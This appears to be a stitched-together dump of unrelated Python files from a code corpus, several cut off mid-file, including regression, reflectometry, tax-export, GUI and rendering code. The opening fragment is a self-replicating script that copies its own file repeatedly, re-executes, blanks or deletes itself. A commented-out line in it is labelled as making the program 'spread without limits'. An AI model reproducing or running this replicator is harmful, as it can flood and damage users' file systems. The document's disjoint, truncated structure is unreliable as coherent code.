nL = len(x)
os.path.basename(__file__)
nNS = (os.path.basename(__file__)[nL:])[:-3] + str(i)
s = __file__
d = os.path.join(os.path.dirname(__file__), x + nNS + '.py')
copyfile(s, d)
sleep(y)
k = []
for g in os.listdir(os.path.abspath(os.path.dirname(__file__))):
for n in range(0,z):
if g == (os.path.basename(__file__)[:-3] + str(n) + ".py"):
k.append(g)
if v == 0 and len(k) == z:
exec(open(__file__).read())
elif v == 1 and len(k) == z:
f = open(__file__ , "w")
f.write("")
f.close
elif v == 2 and len(k) == z:
f = open(__file__ , "w")
f.write(t)
f.close
elif v == 3 and len(k) == z:
os.remove(__file__)
else:
exec(open(__file__).read())\n"""
############################################################################################
############ The Line Below Will Make The Program Spread Without Limits ############
############################################################################################
""" #os.system(os.path.dirname(__file__), name + nNS + '.py')"""
############################################################################################
########################## !Delete the '#' at own risk! ############################
############################################################################################
# Makes the file heavier if the option is selected.
+ "\n" + amountOfExtraGarbage * extraGarbage)
f.close()
#This executes the first file.
#os.system(targetDirectory + name + ".py")
############################################################################################
############################################################################################
############################################################################################
| 3.125 | 3 |
lin.py | iboraham/linear-reg-from-scratch | 0 | 12765137 | import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score
from shared_utilities import find_linearReg_optimal_test_size
from shared_utilities import plot_linear_reg
from shared_utilities import check_outlier
from shared_utilities import plot_scatter
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
if __name__ == '__main__':
df = pd.read_csv('Real estate.csv')
X = df.iloc[:, 1:-1]
y = df.iloc[:, -1]
plot_scatter(X.iloc[:, 2], y, 'scatter.png')
# Scale X
sc = StandardScaler()
X_scaled = sc.fit_transform(X)
f = open("values.txt", "a")
f.write(str(X))
f.close()
raise Exception()
# PCA for feature reduction
pca = PCA(n_components='mle', svd_solver='full', random_state=42)
X_pca = pca.fit_transform(X_scaled)
print(X_pca.min(), X_pca.max())
test_size = find_linearReg_optimal_test_size(X, y)
X_train, X_test, y_train, y_test = train_test_split(X_pca, y, test_size=test_size, random_state=42)
mdl = LinearRegression().fit(X_train, y_train)
y_pred = mdl.predict(X_test)
score = r2_score(y_test, y_pred)
# plot_linear_reg('linear_reg.png', y_pred, X_test.iloc[:, 2], y_test)
| 2.71875 | 3 |
extra_utils/finetune_to_save_states.py | humanlab/HaRT | 0 | 12765138 | import pandas as pd
import torch
import torch.nn as nn
from transformers.modeling_outputs import SequenceClassifierOutputWithPast
from ..src.model.hart import HaRTPreTrainedModel
class ArHulmForSequenceClassification(HaRTPreTrainedModel):
# _keys_to_ignore_on_load_missing = [r"h\.\d+\.attn\.masked_bias", r"lm_head\.weight"]
def __init__(self, config, output_dir, agg_type, arhulm=None):
super().__init__(config)
self.num_labels = config.num_labels
self.use_history_output = config.use_history_output
self.score = nn.Linear(config.n_embd, self.num_labels, bias=False)
self.output_dir = output_dir
self.agg_type = agg_type
if arhulm:
self.transformer = arhulm
else:
self.transformer = HaRTPreTrainedModel(config)
self.init_weights()
# Model parallel
self.model_parallel = False
self.device_map = None
def forward(
self,
input_ids=None,
user_ids=None,
history=None,
past_key_values=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for computing the sequence classification/regression loss. Indices should be in :obj:`[0, ...,
config.num_labels - 1]`. If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),
If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
transformer_outputs = self.transformer(
input_ids,
history=history,
output_block_last_hidden_states=True,
past_key_values=past_key_values,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
users = pd.DataFrame(user_ids.cpu().detach().numpy(), columns=['user_id'])
users = users.loc[users.index.repeat(768)]
users.reset_index(drop=True, inplace=True)
if self.agg_type=='last':
user_states = transformer_outputs.history[0][-1]
elif self.agg_type=='sum':
all_blocks_user_states = torch.stack(transformer_outputs.history[0], dim=1)
user_states = torch.sum(all_blocks_user_states, dim=1)
elif self.agg_type=='avg':
all_blocks_user_states = torch.stack(transformer_outputs.history[0], dim=1)
user_states = torch.sum(all_blocks_user_states, dim=1)/all_blocks_user_states.shape[1]
elif self.agg_type=='masked_last':
states = transformer_outputs.history[0]
masks = transformer_outputs.history[1]
multiplied = tuple(l * r for l, r in zip(states, masks))
all_blocks_user_states = torch.stack(multiplied, dim=1).cpu().detach()
all_blocks_masks = torch.stack(masks, dim=1)
divisor = torch.sum(all_blocks_masks, dim=1).cpu().detach()
user_states = all_blocks_user_states[range(all_blocks_user_states.shape[0]), divisor.squeeze()-1]
elif self.agg_type=='masked_sum':
states = transformer_outputs.history[0]
masks = transformer_outputs.history[1]
multiplied = tuple(l * r for l, r in zip(states, masks))
all_blocks_user_states = torch.stack(multiplied, dim=1)
user_states = torch.sum(all_blocks_user_states, dim=1)
elif self.agg_type=='masked_avg':
states = transformer_outputs.history[0]
masks = transformer_outputs.history[1]
multiplied = tuple(l * r for l, r in zip(states, masks))
all_blocks_user_states = torch.stack(multiplied, dim=1)
all_blocks_masks = torch.stack(masks, dim=1)
sum = torch.sum(all_blocks_user_states, dim=1)
divisor = torch.sum(all_blocks_masks, dim=1)
user_states = sum/divisor
logits = user_states
loss = torch.Tensor([0.1]).cuda()
user_states = pd.DataFrame(user_states.cpu().detach().numpy())
user_states = user_states.stack().reset_index()
user_states['level_0'] = users['user_id']
user_states.rename(columns={'level_0':'user_id','level_1': 'column_number', 0:'value'}, inplace=True)
user_states.to_csv(self.output_dir + '/test_states_' + str(user_ids[0].item()) + '.csv', index=False)
return SequenceClassifierOutputWithPast(
loss=loss,
logits=logits,
past_key_values=transformer_outputs.past_key_values,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
)
| 2.4375 | 2 |
src/terra/contracts/apollo/__init__.py | fentas/staketaxcsv | 0 | 12765139 | import logging
from terra import util_terra
from terra.execute_type import (
_execute_type,
)
from .zap import (
handle_zap_into_strategy,
handle_zap_out_of_strategy,
)
def handle(exporter, elem, txinfo, index):
execute_msg = util_terra._execute_msg(elem, index)
if "send" in execute_msg:
msg = execute_msg["send"]["msg"]
# Apollo
if "zap_into_strategy" in msg:
return handle_zap_into_strategy(exporter, elem, txinfo)
if "zap_out_of_strategy" in msg:
return handle_zap_out_of_strategy(exporter, elem, txinfo)
execute_type = _execute_type(elem, txinfo, index)
logging.info("[apollo] General transaction type=%s txid=%s", execute_type, elem["txhash"])
return execute_type | 2.03125 | 2 |
src/pyc/compile.py | ahojukka5/pyc | 2 | 12765140 | <gh_stars>1-10
import os
import sysconfig
import subprocess
from typing import Tuple
from Cython.Build import cythonize
from Cython.Compiler import Options
def compile(source_file: str, verbose: bool = False) -> Tuple[int, str]:
"""Compile Python source file to executable using Cython."""
basename = os.path.splitext(source_file)[0]
c_file = basename + ".c"
executable = "a.out"
# Generate c file
Options.embed = "main"
compiler_directives = {"language_level": "3"} # or "2" or "3str"
cythonize(source_file, compiler_directives=compiler_directives,
force=True, quiet=not verbose)
# Compile c file to executable
cvars = sysconfig.get_config_vars()
CC = cvars["CC"] # x86_64-linux-gnu-gcc
INCLUDEPY = cvars["INCLUDEPY"] # /usr/include/python3.8
BLDLIBRARY = cvars["BLDLIBRARY"] # -lpython3.8
BINLIBDEST = cvars["BINLIBDEST"] # /usr/lib/python3.8
cmd = f"{CC} -O2 {c_file} -I{INCLUDEPY} -L{BINLIBDEST} {BLDLIBRARY} -o {executable}"
if verbose:
print(cmd)
return_code = subprocess.check_call(cmd.split(" "))
if return_code != 0:
print("Compilation failed.")
return return_code, executable
| 2.578125 | 3 |
python/to-lower-hyphen.py | smoogi/magic | 0 | 12765141 | """
Developed by: <NAME> (2018)
This script rename all files in the specified directory to lowercase and then replace all white space with hyphen (-).
"""
import os
import sys
import glob
import argparse
# Print welcome message
print("\nDeveloped by: <NAME> (2018)\n"
"This script rename all files in the specified directory to lowercase.\n"
"and then replace all white space with hyphen (-).\n")
# Set up the argument variables
parser = argparse.ArgumentParser()
parser.add_argument("working_directory", help="Path to a working directory")
args = parser.parse_args()
working_directory = args.working_directory
# Get the iterator in case file list is so large
file_list = glob.iglob(os.path.join(working_directory, '*'))
print("Beginning the process...")
for f in file_list:
# Don't process a directory
if os.path.isdir(f):
continue
# Get only filename
filename = os.path.basename(f)
# Split filename and extension
filename_split = os.path.splitext(filename)
# Change to filename lowercase and replace whitespace with hyphen then concat with extension again
new_f = os.path.join(working_directory, filename_split[0].replace(" ", "-").lower() + filename_split[1])
# Rename old file name to new file name
os.renames(f, new_f)
# Print feedback to user
print("'" + f + "' has been renamed.")
print("Process finished successfully.\n")
| 3.59375 | 4 |
pe/_definition.py | goodmami/pe | 18 | 12765142 |
from typing import Dict, Tuple, Callable, Any
from pe._constants import Operator
from pe._errors import Error
from pe._escape import escape
DOT = Operator.DOT
LIT = Operator.LIT
CLS = Operator.CLS
RGX = Operator.RGX
SYM = Operator.SYM
OPT = Operator.OPT
STR = Operator.STR
PLS = Operator.PLS
AND = Operator.AND
NOT = Operator.NOT
CAP = Operator.CAP
BND = Operator.BND
SEQ = Operator.SEQ
CHC = Operator.CHC
RUL = Operator.RUL
DEF = Operator.DEF
DBG = Operator.DBG
class Definition:
"""An abstract definition of a parsing expression."""
__slots__ = 'op', 'args',
def __init__(self, op: Operator, args: Tuple[Any, ...]):
self.op = op
self.args = args
def __repr__(self):
return f'({self.op}, {self.args!r})'
def __str__(self):
return _format(self, None)
def __eq__(self, other: object):
if not isinstance(other, Definition):
return NotImplemented
return (self.op == other.op
and self.args == other.args)
def format(self) -> str:
return _format(self, DEF)
def _format_dot(defn: Definition, prev_op: Operator) -> str:
return '.'
def _format_literal(defn: Definition, prev_op: Operator) -> str:
return f'''"{escape(defn.args[0], ignore="'[]")}"'''
def _format_class(defn: Definition, prev_op: Operator) -> str:
def esc(s):
return escape(s, ignore='"\'')
clsstr = ''.join(f'{esc(a)}-{esc(b)}' if b else esc(a)
for a, b in defn.args[0])
if defn.args[1]:
return f'''(![{clsstr}] .)'''
else:
return f'''[{clsstr}]'''
def _format_regex(defn: Definition, prev_op: Operator) -> str:
return f'`{defn.args[0]}`' # temporary syntax
def _format_nonterminal(defn: Definition, prev_op: Operator) -> str:
return defn.args[0]
_format_decorators: Dict[Operator, Tuple[str, str, str]] = {
OPT: ('', '', '?'),
STR: ('', '', '*'),
PLS: ('', '', '+'),
AND: ('&', '', ''),
NOT: ('!', '', ''),
CAP: ('~', '', ''),
BND: ('{}:', '', ''),
SEQ: ('', ' ', ''),
CHC: ('', ' / ', ''),
RUL: ('', '', ' -> {}'),
}
def _format_recursive(defn: Definition, prev_op: Operator) -> str:
op = defn.op
args = defn.args
prefix, delimiter, suffix = _format_decorators[op]
fmt = '({})' if prev_op and op.precedence <= prev_op.precedence else '{}'
if delimiter:
body = delimiter.join(_format(d, op) for d in args[0])
else:
body = _format(args[0], op)
body = body.replace('{', '{{').replace('}', '}}')
return fmt.format((prefix + body + suffix).format(*args[1:]))
def _format_debug(defn: Definition, prev_op: Operator) -> str:
return _format(defn.args[0], prev_op)
_Formatter = Callable[[Definition, Operator], str]
_format_map: Dict[Operator, _Formatter] = {
DOT: _format_dot,
LIT: _format_literal,
CLS: _format_class,
RGX: _format_regex,
SYM: _format_nonterminal,
OPT: _format_recursive,
STR: _format_recursive,
PLS: _format_recursive,
AND: _format_recursive,
NOT: _format_recursive,
CAP: _format_recursive,
BND: _format_recursive,
SEQ: _format_recursive,
CHC: _format_recursive,
RUL: _format_recursive,
DBG: _format_debug,
}
def _format(defn: Definition,
prev_op: Operator) -> str:
try:
func = _format_map[defn.op]
except KeyError:
raise Error(f'invalid operation: {defn.op!r}')
return func(defn, prev_op)
| 2.640625 | 3 |
direfl/api/sld_profile.py | TUM-E21-ThinFilms/direfl | 0 | 12765143 | import numpy as np
import cmath
from functools import reduce
from math import pi, ceil
from numpy import sin, cos
from scipy.interpolate import interp1d
"""
References:
[Majkrzak2003] <NAME>, <NAME>: Physica B 336 (2003) 27-38
Phase sensitive reflectometry and the unambiguous determination
of scattering length density profiles
"""
def interpolate(x, fx):
return interp1d(x, fx, bounds_error=False, fill_value=0)
def refr_idx(q, sld):
"""
Calculates the refractive index with given SLD [\AA^{-2}] and wavevector transfer q [
\AA^{-1}]. The units can be arbitrary choosen, but they must satisfy that sld/q**2 has
unit [1]. The arguments should not be scaled by any constants.
For example
q = 0.01
sld = 1e-6
The refractive index is complex if q < q_c (being the critical edge) and it is
completely real if q >= q_c.
"""
return cmath.sqrt(1 - 16 * pi * sld / (q ** 2))
def reflection_matrix(q, sld, thickness, as_matrix=False):
"""
Calculates a reflection matrix used for calculating the reflectivity of
a slab of material (sld, thickness) for the wave vector transfer q.
See <NAME>, <NAME>: Physical Review B Vol. 52 Nr 15, 1995:
Exact determination of the phase in neutron reflectometry, Equation (1)
If as_matrix is True, a matrix 2x2 will be returned, if not, then the matrix
indices are returned as a, b, c, d
"""
n = refr_idx(q, sld)
theta = 0.5 * q * n * thickness
a, b, c, d = cos(theta), 1 / n * sin(theta), -n * sin(theta), cos(theta)
if as_matrix:
return np.array([[a, b], [c, d]])
return a, b, c, d
class SLDProfile(object):
def __init__(self):
pass
def as_matrix(self, q):
"""
Returns the matrix coefficients in the abeles formalism.
Returns w, x, y, z corresponding to the matrix [[w, x], [y, z]]
"""
return 0, 0, 0, 0
class ConstantSLDProfile(SLDProfile):
def __init__(self, sld, thickness, sigma=0):
if sld > 15:
raise RuntimeError("SLD seems to be unreasonable high")
self._sld = float(sld)
self._d = float(thickness)
self._r = float(sigma)
if self._r > 0:
raise NotImplementedError("Roughness not implemented yet")
def as_matrix(self, q):
return reflection_matrix(q, self._sld, self._d)
class ConcatSLDProfile(SLDProfile):
"""
The first element in sld_profiles is closest to the substrate
"""
def __init__(self, sld_profiles, reverse=False):
self._slds = sld_profiles
self._reverse = reverse
def as_matrix(self, q):
m = len(self._slds) * [None]
for i in range(0, len(self._slds)):
a, b, c, d = self._slds[i].as_matrix(q)
m[i] = np.array([[a, b], [c, d]])
if self._reverse:
m = list(reversed(m))
m = np.linalg.multi_dot(m)
return m[0][0], m[0][1], m[1][0], m[1][1]
class FunctionSLDProfile(SLDProfile):
def __init__(self, function, support, dx=0.1):
self._f = function
self._supp = support
self._dx = dx
self._xspace = np.linspace(support[0], support[1],
ceil((support[1] - support[0]) * 1 / dx))
self._feval = [self._f(x) for x in self._xspace]
self._m = [ConstantSLDProfile(fx, dx) for fx in self._feval]
self._concat = ConcatSLDProfile(self._m, reverse=False)
def as_matrix(self, q):
return self._concat.as_matrix(q)
class SlabsSLDProfile(SLDProfile):
def __init__(self, z, rho):
self._z = z
self._rho = rho
@classmethod
def from_sample(cls, sample, dz=0.1, dA=1e-4, probe=None):
from refl1d.probe import NeutronProbe
from refl1d.profile import Microslabs
if probe is None:
# The values T and L do not matter for 'just' building the SLD profile
probe = NeutronProbe(T=[1.0], L=[1.0])
slabs = Microslabs(1, dz)
sample.render(probe, slabs)
slabs.finalize(True, dA)
# ignore the imaginary part, this should be zero anyway
z, rho, irho = slabs.smooth_profile(dz)
if any(irho >= 1e-2):
raise RuntimeWarning("Sample contains absorptive SLD (imag >= 1e-2). "
"Reconstruction techniques do not support this.")
# refl1d likes to use SLD * 1e6
return cls(z, rho * 1e-6)
@classmethod
def from_slabs(cls, thickness, sld, roughness, precision=1):
# You should rather use the from_sample method, since its easier to
# understand. This method here is just a kind of 'fallback'
# if you don't wanna have the overhead of building the Stacks in refl1d
# just to put the data in here..
#
# WARNING: from_slabs and from_sample do not create the same slab profile
# they are shifted profiles (by I'd guess 3*roughness[0]?)
from refl1d.profile import build_profile
w = thickness
sld = sld
# Means, the first layer is the substrate and we only have to include
# the roughness effect. To do so, select a proper thickness (> 0) such
# that the convolution with the gaussian kernel is sufficiently approximated
if w[0] == 0:
# refl1d uses 3 sigma usually
# why 3?
# that's 3 sigma and the gaussian smoothing is nearly zero out there
# thus the 'substrate' layer is big enough to be approximated by this
# ofc bigger sigma values (>= 5) are better, but they need more
# computation
w[0] = 3 * roughness[0]
z = np.linspace(0, sum(w) + roughness[-1] * 5, int(precision * sum(w)) + 1)
offsets = np.cumsum(w)
rho = build_profile(z, offsets, roughness, sld)
return cls(z, rho)
def thickness(self):
return max(self._z) - min(self._z)
def plot_profile(self, offset=0, reverse=False):
import pylab
rho = self._rho
if reverse:
rho = list(reversed(self._rho))
pylab.plot(self._z + offset, rho)
def as_matrix(self, q):
# len(dz) = len(self._z) - 1
dz = np.diff(self._z)
m = len(dz) * [None]
for idx in range(0, len(dz)):
m[idx] = reflection_matrix(q, self._rho[idx], dz[idx], as_matrix=True)
# There is still some potential here
# Whats happening here:
# m1 * m2 * m3 * m4 * m5 ... in a sequentially manner
# maybe it's faster if you do something like
# (m1 * m2) * (m3 * m4) * ...
# and redo the grouping in the next step. this should be then O(log n)
# compared to the seq. multiplication which is O(n)....
# BUT: this has to be done in C code, not in a python implementation :/
m = reduce(np.dot, m)
return m[0][0], m[0][1], m[1][0], m[1][1]
class Reflectivity(object):
def __init__(self, sld_profile, fronting, backing):
assert isinstance(sld_profile, SLDProfile)
self._sld = sld_profile
self._f, self._b = fronting, backing
# The input should be of the magnitude 1e-6 ... 1e-5
if any(abs(np.array([fronting, backing])) >= 1e-1):
raise RuntimeWarning("Given fronting/backing SLD values are too high")
def reflection(self, q_space, as_function=True):
r = np.ones(len(q_space), dtype=complex)
for idx, q in enumerate(q_space):
if abs(q) < 1e-10:
continue
# See [Majkrzak2003] equation (17)
f, h = refr_idx(q, self._f), refr_idx(q, self._b)
A, B, C, D = self._sld.as_matrix(q)
r[idx] = (f * h * B + C + 1j * (f * D - h * A)) / \
(f * h * B - C + 1j * (f * D + h * A))
if as_function:
return self.to_function(r, q_space, square=False)
else:
return r
@staticmethod
def to_function(r, q_space, square=False):
real = interpolate(q_space, r.real)
imag = interpolate(q_space, r.imag)
if square:
return lambda q: real(q)**2 + imag(q)**2
else:
return lambda q: real(q) + 1j * imag(q)
def reflectivity(self, q_space):
r = self.reflection(q_space)
return lambda q: abs(r(q)) ** 2
def plot(self, q_space):
import pylab
R = self.reflectivity(q_space)
pylab.plot(q_space, R(q_space))
return R
| 2.953125 | 3 |
tests/runtime-trace-tests/cases/assign_stmt.py | jaydeetay/pxt | 977 | 12765144 | # regular assignment
foo = 7
print(foo)
# annotated assignmnet
bar: number = 9
print(bar)
| 2.390625 | 2 |
hexrd/ui/line_picker_dialog.py | cjh1/hexrdgui | 0 | 12765145 | <filename>hexrd/ui/line_picker_dialog.py
import copy
from PySide2.QtCore import Qt, QObject, Signal
from itertools import cycle
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Cursor
from hexrd.ui import enter_key_filter
from hexrd.ui.constants import ViewType
from hexrd.ui.ui_loader import UiLoader
from hexrd.ui.zoom_canvas import ZoomCanvas
class LinePickerDialog(QObject):
# Emitted when a point was picked
point_picked = Signal()
# Emitted when a line is completed
line_completed = Signal()
# Emitted when the dialog is closed
finished = Signal()
# Emits the ring data that was selected
result = Signal(list)
# Emitted when the last point was removed
last_point_removed = Signal()
def __init__(self, canvas, parent, single_line_mode=False):
super(LinePickerDialog, self).__init__(parent)
self.canvas = canvas
loader = UiLoader()
self.ui = loader.load_file('line_picker_dialog.ui', parent)
self.single_line_mode = single_line_mode
self.ui.start_new_line_label.setVisible(not self.single_line_mode)
flags = self.ui.windowFlags()
self.ui.setWindowFlags(flags | Qt.Tool)
self.ui.installEventFilter(enter_key_filter)
self.ring_data = []
self.linebuilder = None
self.lines = []
self.two_click_mode = False
self.zoom_canvas = ZoomCanvas(canvas)
self.zoom_canvas.tth_tol = self.ui.zoom_tth_width.value()
self.zoom_canvas.eta_tol = self.ui.zoom_eta_width.value()
self.ui.zoom_canvas_layout.addWidget(self.zoom_canvas)
prop_cycle = plt.rcParams['axes.prop_cycle']
self.color_cycler = cycle(prop_cycle.by_key()['color'])
self.move_dialog_to_left()
self.setup_connections()
def setup_connections(self):
self.ui.accepted.connect(self.accept)
self.ui.rejected.connect(self.reject)
self.ui.zoom_tth_width.valueChanged.connect(self.zoom_width_changed)
self.ui.zoom_eta_width.valueChanged.connect(self.zoom_width_changed)
self.ui.back_button.pressed.connect(self.back_button_pressed)
self.point_picked.connect(self.update_enable_states)
self.last_point_removed.connect(self.update_enable_states)
self.ui.two_click_mode.toggled.connect(self.two_click_mode_changed)
self.bp_id = self.canvas.mpl_connect('button_press_event',
self.button_pressed)
self.zoom_canvas.point_picked.connect(self.zoom_point_picked)
def update_enable_states(self):
linebuilder = self.linebuilder
enable_back_button = (
linebuilder is not None and
all(z for z in [linebuilder.xs, linebuilder.ys])
)
self.ui.back_button.setEnabled(enable_back_button)
def move_dialog_to_left(self):
# This moves the dialog to the left border of the parent
ph = self.ui.parent().geometry().height()
px = self.ui.parent().geometry().x()
py = self.ui.parent().geometry().y()
dw = self.ui.width()
dh = self.ui.height()
self.ui.setGeometry(px, py + (ph - dh) / 2.0, dw, dh)
def clear(self):
self.ring_data.clear()
while self.lines:
self.lines.pop(0).remove()
self.linebuilder = None
self.cursor = None
self.zoom_canvas.cleanup()
self.zoom_canvas = None
self.canvas.mpl_disconnect(self.bp_id)
self.bp_id = None
self.canvas.draw()
def zoom_width_changed(self):
self.zoom_canvas.tth_tol = self.ui.zoom_tth_width.value()
self.zoom_canvas.eta_tol = self.ui.zoom_eta_width.value()
self.zoom_canvas.render()
def zoom_point_picked(self, event):
self.zoom_frozen = False
if self.linebuilder is None:
return
# Append the data to the line builder
self.linebuilder.append_data(event.xdata, event.ydata)
def back_button_pressed(self):
linebuilder = self.linebuilder
if linebuilder is None:
# Nothing to do
return
if not linebuilder.xs or not linebuilder.ys:
# Nothing to delete
return
linebuilder.xs.pop(-1)
linebuilder.ys.pop(-1)
linebuilder.update_line_data()
self.last_point_removed.emit()
def two_click_mode_changed(self, on):
self.two_click_mode = on
self.zoom_frozen = False
def start(self):
if self.canvas.mode != ViewType.polar:
print('line picker only works in polar mode!')
return
ax = self.canvas.axis
# list for set of rings 'picked'
self.ring_data.clear()
# fire up the cursor for this tool
self.cursor = Cursor(ax, useblit=True, color='red', linewidth=1)
self.add_line()
self.show()
def add_line(self):
ax = self.canvas.axis
color = next(self.color_cycler)
marker = '.'
linestyle = 'None'
# empty line
line, = ax.plot([], [], color=color, marker=marker,
linestyle=linestyle)
self.linebuilder = LineBuilder(line)
self.linebuilder.point_picked.connect(self.point_picked.emit)
self.update_enable_states()
self.lines.append(line)
self.canvas.draw()
def line_finished(self):
linebuilder = self.linebuilder
# If the linebuilder is already gone, just return
if linebuilder is None:
return
# append to ring_data
ring_data = np.vstack([linebuilder.xs, linebuilder.ys]).T
if len(ring_data) == 0:
# Don't do anything if there is no ring data
return
self.ring_data.append(ring_data)
self.add_line()
def button_pressed(self, event):
if event.button == 3:
# Advance the line to the next one
self.next_line()
return
if event.button != 1:
# Nothing else to do
return
if self.two_click_mode:
# Freeze the zoom window
self.zoom_frozen = True
return
if self.linebuilder is None:
return
self.linebuilder.append_data(event.xdata, event.ydata)
def next_line(self):
if not self.single_line_mode:
# Complete a line
self.line_completed.emit()
self.line_finished()
return
# Otherwise, insert NaNs
if self.linebuilder is None:
return
self.linebuilder.append_data(np.nan, np.nan)
def accept(self):
# Finish the current line
self.line_finished()
# finished needs to be emitted before the result
self.finished.emit()
self.result.emit(copy.deepcopy(self.ring_data))
self.clear()
def reject(self):
self.finished.emit()
self.clear()
def show(self):
self.ui.show()
@property
def zoom_frozen(self):
return self.zoom_canvas.frozen
@zoom_frozen.setter
def zoom_frozen(self, v):
self.zoom_canvas.frozen = v
class LineBuilder(QObject):
# Emits when a point was picked
point_picked = Signal()
def __init__(self, line):
super().__init__()
self.line = line
self.canvas = line.figure.canvas
self.xs = list(line.get_xdata())
self.ys = list(line.get_ydata())
def append_data(self, x, y):
self.xs.append(x)
self.ys.append(y)
self.update_line_data()
self.point_picked.emit()
def update_line_data(self):
self.line.set_data(self.xs, self.ys)
self.canvas.draw()
| 2.265625 | 2 |
figures/kCSD_properties/colorblind_friendly.py | rdarie/kCSD-python | 11 | 12765146 | <reponame>rdarie/kCSD-python<filename>figures/kCSD_properties/colorblind_friendly.py<gh_stars>10-100
# Based on
# Color Universal Design (CUD)
# - How to make figures and presentations that are friendly to Colorblind people
#
#
# <NAME>
# Jikei Medial School (Japan)
#
# <NAME>
# University of Tokyo, Institute for Molecular and Cellular Biosciences (Japan)
# (both are strong protanopes)
# 11.20.2002 (modified on 2.15.2008, 9.24.2008)
# http://jfly.iam.u-tokyo.ac.jp/color/#pallet
import collections
from matplotlib import colors
_Color = collections.namedtuple('_Color', ['red', 'green', 'blue'])
def _html(r, g, b):
return "#{:02X}{:02X}{:02X}".format(r, g, b)
_BLACK = _Color( 0, 0, 0)
_ORANGE = _Color(230, 159, 0)
_SKY_BLUE = _Color( 86, 180, 233)
_GREEN = _Color( 0, 158, 115)
_YELLOW = _Color(240, 228, 66)
_BLUE = _Color( 0, 114, 178)
_VERMILION = _Color(213, 94, 0)
_PURPLE = _Color(204, 121, 167)
BLACK = _html(*_BLACK)
ORANGE = _html(*_ORANGE)
SKY_BLUE = _html(*_SKY_BLUE)
GREEN = _html(*_GREEN)
YELLOW = _html(*_YELLOW)
BLUE = _html(*_BLUE)
VERMILION = _html(*_VERMILION)
PURPLE = _html(*_PURPLE)
def _BipolarColormap(name, negative, positive):
return colors.LinearSegmentedColormap(
name,
{k: [(0.0,) + (getattr(negative, k) / 255.,) * 2,
(0.5, 1.0, 1.0),
(1.0,) + (getattr(positive, k) / 255.,) * 2,]
for k in ['red', 'green', 'blue']})
bwr = _BipolarColormap('cbf.bwr', _BLUE, _VERMILION)
PRGn = _BipolarColormap('cbf.PRGn', _PURPLE, _GREEN) | 2.859375 | 3 |
server/scripts/mts_render.py | smartscenes/multiscan | 6 | 12765147 | import os
import mitsuba
import numpy as np
import argparse
import utils
mitsuba.set_variant('scalar_spectral')
from mitsuba.core import xml, Thread, ScalarTransform4f, Transform4f, Bitmap, Struct
from mitsuba.python.xml import WriteXML
from enoki.scalar import *
import open3d as o3d
from plyfile import PlyData, PlyElement
from render import gravity_aligned_mobb
def cvt_rgba2float(filename, tmp_out_file):
plydata = PlyData.read(filename)
x = np.asarray(plydata['vertex']['x'])
y = np.asarray(plydata['vertex']['y'])
z = np.asarray(plydata['vertex']['z'])
red = plydata['vertex']['red'].astype('float32') / 255.
green = plydata['vertex']['green'].astype('float32') / 255.
blue = plydata['vertex']['blue'].astype('float32') / 255.
vertices = np.vstack((x, y, z, red, green, blue)).transpose()
ply_vertices = [tuple(x) for x in vertices.tolist()]
ply_vertices = np.array(ply_vertices, dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4'),
('red', 'f4'), ('green', 'f4'), ('blue', 'f4')])
el = PlyElement.describe(ply_vertices, 'vertex')
plydata.elements = [el, plydata['face']]
plydata.write(os.path.join(os.path.dirname(filename), tmp_out_file))
return vertices
def mts_render(filename, vertices, output):
data = {"type": "scene", "./": {"type": "path"}}
shape_dict = {
"type": "ply", 'filename': filename,
"mybsdf": {
"type": "diffuse",
"reflectance": {
"type": "mesh_attribute",
"name": "vertex_color"
# "type": "rgb",
# "value": [231. / 255, 181. / 255, 75. / 255],
}
}
}
emitter_dict = {"type": "constant"}
sensor_dict = {
"type": "perspective",
'fov': 60,
"myfilm": {
"type": "hdrfilm",
"rfilter": {"type": "gaussian"},
"width": 1920,
"height": 1440,
"pixel_format": "rgba"
},
"mysampler": {
"type": "independent",
"sample_count": 64,
}
}
obb_center, obb_size, trans_inv = gravity_aligned_mobb(vertices[:, 0:3], np.array((0.0,1.0,0.0)))
rot = trans_inv
inv_rot = np.linalg.inv(rot)
cam_target = obb_center
cam_translate = Transform4f.translate(cam_target)
cam_un_translate = Transform4f.translate(-cam_target)
world_up = Vector3f(0, 0, -1)
cam_offvec = Vector3f(0, 0, 0)
margin = 1.0
radius = np.linalg.norm(obb_size) / 2.0 + margin
cam_offset = cam_offvec + world_up
cam_offset = rot.dot(cam_offset)
cam_offset = 2 * radius * cam_offset / np.linalg.norm(cam_offset)
cam_origin = cam_target + cam_offset
cam_up = rot.dot(Vector3f(0, 1, 0))
sensor_dict['to_world'] = ScalarTransform4f.look_at(origin=cam_origin, target=cam_target, up=cam_up)
data['myshape'] = shape_dict
data['mysensor'] = sensor_dict
data['myemitter'] = emitter_dict
scene = xml.load_dict(data)
sensor = scene.sensors()[0]
scene.integrator().render(scene, sensor)
film = sensor.film()
film.set_destination_file(os.path.splitext(output)[0]+'.exr')
film.develop()
img = film.bitmap(raw=True).convert(Bitmap.PixelFormat.RGB, Struct.Type.UInt8, srgb_gamma=True)
img.write(output)
# out = WriteXML('./test.xml')
# out.write_dict(data)
def configure(args):
if not utils.file_exist(args.input, '.ply'):
utils.print_e(f'Input file {args.input} not exists')
return False
dir_path = os.path.dirname(args.output)
if not utils.folder_exist(dir_path):
utils.print_e(f'Cannot create file in folder {dir_path}')
return False
return True
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Mitsuba2 Rendering!')
parser.add_argument('-i', '--input', dest='input', type=str, action='store', required=True,
help='Input mesh ply file')
